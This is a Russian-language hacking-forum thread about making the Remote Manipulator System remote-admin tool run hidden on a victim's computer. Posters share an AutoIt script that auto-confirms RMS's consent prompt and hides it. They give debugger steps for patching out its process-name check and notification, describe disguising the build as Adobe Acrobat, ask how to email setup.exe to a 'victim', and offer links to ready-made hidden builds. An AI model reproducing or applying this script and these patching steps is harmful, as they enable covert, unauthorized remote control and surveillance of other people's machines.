1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

  1. Squedix
    Squedix Новичок
    Симпатии:
    0
    Делал все точности как в видео. Ну не все, я хотел лишь пропатчить уведомление об отправке ИД на мыло. Вроде сделал правильно но предупреждение все равно вылазит. Вопрос: Это я криворукий и что то не догнал или просто уведомление не так патчится?
     
    7 фев 2016
  2. WhiteDefender
    WhiteDefender Новичок
    Симпатии:
    0
    попробуй через Autoit
     
    7 фев 2016
  3. Squedix
    Squedix Новичок
    Симпатии:
    0
    Хммм, не можешь убрать так обойди, умно. Спасибо за совет, щяс попробуем.
     
    7 фев 2016
  4. Namezz
    Namezz Новичок
    Симпатии:
    0
    тоже самое сделай в rfusclient.exe
     
    7 фев 2016
  5. WhiteDefender
    WhiteDefender Новичок
    Симпатии:
    0
    Код:
    #NoTrayIcon
    While 1
        $hRMS = WinGetHandle("Remote Manipulator System - Вопрос")
        $hWnd = WinGetHandle("[ACTIVE]")
        If $hWnd<>0 and ($hRMS="")  Then
            WinSetOnTop($hWnd, "", 1)
        EndIf
          If $hRMS<>"" Then
          ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]")
          ExitLoop
        EndIf
    WEnd
    
    Если что пиши сюда : vk.com/yarikvasilcenko
    Есть полностью скрытая сборка с другим процессом, неубиваемым, другим сервисом, кароч полностью скрыто под Adobe Acrobat
     
    7 фев 2016
  6. Squedix
    Squedix Новичок
    Симпатии:
    0
    Хах, занятно, щя ехал в автобусе и как раз думал что скорей всего надо было с 2 екзешниками это делать. Вот башка тупая, не додумался сразу XD
    За видео спасибо, очень выручил. И еще одно, наверное тупой вопрос но все же: как тут симпатии ставить? А то вы мне помогли а я не знаю как вам лайк впаять.
     
    Последнее редактирование: 7 фев 2016
    7 фев 2016
  7. с.ю.
    с.ю. Новичок
    Симпатии:
    0
    Господа! Дайте хоть подсказку какую нибудь, как нормально переименовать процесс, чтобы не вылетал. Перезапуск службы- не вариант.
    Я не могу понять, если процесс проверяет своё название, то с чем он его сравнивает, везде ведь всё переименовано.
     
    10 фев 2016
  8. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    Потому что ты не все поменял! существует еще 4-я запись rutserv.exe, но она зашифрована. И взломать этот шифр маловероятно что ктото сможет. Поэтому эту защиту нужно только отключать, или увеличивать время таймера до нескольких дней, месяцев или лет!
     
    12 фев 2016
  9. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    65
    Ищем "Invalid exe-file name." Перед ним меняем условный переход на безусловный. Затем ставим бряк на Sleep/SleepEx, ждем 60000 мсек и тассируем. Предположительно в цикле после 6-8 sleepпов процесс принимает ислам. Ещё ставит подозрительный таймер на 6 минут. Что делает не смотрел.
    Это в рутсерв.
     
    13 фев 2016
  10. WhiteDefender
    WhiteDefender Новичок
    Симпатии:
    0
    А если просто скинуть уже готовый? ;D
     
    13 фев 2016
  11. licevuzan
    licevuzan Новичок
    Симпатии:
    0
    Если тебе все нужно уже готовое и на компик жертвы установленое, то ищи людей который тебя за бабки с ложечки покормят.
    Это форум для всеобщего развития, а не поисков халявы, мне вот как то не охота юзать чужой переименованый рутсерв и знать что еще толпы этот файл хз как гоняют и рассылают, а потом все палится ав.
     
    13 фев 2016
  12. bamblby007
    bamblby007 Новичок
    Симпатии:
    0
    Всем привет, я чайник, кто пойдет ко мне в команду, есть идеи, готов поделиться сделанной вместе выручкой.
     
    14 фев 2016
  13. Namezz
    Namezz Новичок
    Симпатии:
    0
    во
     
    25 мар 2016
  14. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    Хм, немного не так как я делаю, но тоже должно работать.
    Единственное не советую название делать длиннее рутсерва, иначе под длинное название не получится пропатчить rfusclient. А для скрытого агента вполне способ подойдет.
     
    27 мар 2016
  15. Namezz
    Namezz Новичок
    Симпатии:
    0
    так то rfusclient нах не нужен и без него все работает...
     
    27 мар 2016
  16. Namezz
    Namezz Новичок
    Симпатии:
    0
    во
     
    27 мар 2016
  17. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    Это на агенте работает, а если стартовать как службу, не будет работать удаленый рабочий стол и управление им.
    Я и говорю, что способ годится только для агента.
    Для агента использовать reg файл для отправки ID, вещь не надежная. Используй .dat файл от разрабов. Его просто рядышком с рутсервом пложить надо.
    Кстати, окно агента я тоже в другом месте убираю. И тоже гораздо проще.
     
    Последнее редактирование: 27 мар 2016
    27 мар 2016
  18. blockagent
    blockagent Новичок
    Симпатии:
    0
    Не отправляет информацию на почту. Почта яндекс, все прописано как надо.
    И еще яндекс не отправляет setup.exe на любую другую почту как вложеный файл. Пишет ошибку. Пробовал рамблером, тоже не отправляет.
    Как доставить письмо жертве?
     
    31 мар 2016
  19. blockagent
    blockagent Новичок
    Симпатии:
    0
    столкнулся с проблемой, не могу зайти на сервер через ID, только по IP заходит. Сервер за роутером, для подключения по IP прокидываю порт, а по ID вообще никак не хочет работать. Кто-то сталкивался?
     
    31 мар 2016
  20. abumakar
    abumakar Новичок
    Симпатии:
    0
    а к чему такой геморой если есть намного проще сборки,более новые )
    могу забубенить статью или смотрите по ссылке на другом борду )
    http://forum.softxaker.ru/showthread.php?t=7151

    http://rghost.ru/7Tkcy7j4B-сама сборка,с файлом для удаления процесса,если нужен краякнутый rms пишите скину в личку
     
    1 апр 2016

Поделиться этой страницей

Загрузка...